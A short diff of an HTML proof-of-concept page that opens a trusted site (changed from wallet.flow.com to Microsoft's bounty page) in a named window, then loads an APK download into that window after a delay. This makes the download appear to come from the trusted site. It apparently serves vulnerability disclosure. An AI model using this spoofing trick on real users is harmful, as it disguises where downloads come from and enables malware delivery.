--- a/ds.html
+++ b/ds.html
@@ -1,7 +1,7 @@
 <html>
  <head> 
   <meta charset="utf-8">
-  <title>wallet.flow.com</title>
+  <title>microsoft.com</title>
 <style>
 .button {
   background-color: #4CAF50;
@@ -20,10 +20,10 @@
  <body> 
   <script>
 function a(){
-	window.open('https://wallet.flow.com', 'x');
+	window.open('https://www.microsoft.com/en-us/msrc/bounty', 'x');
 	setTimeout(function(){
 		window.open('https://download.binance.com/pack/BNApp64.apk', 'x');
-	}, 5000);
+	}, 3000);
 }
 </script> 
   <center><input type="button" class="button" value="Download From Original Site" onclick="a()"> </center>
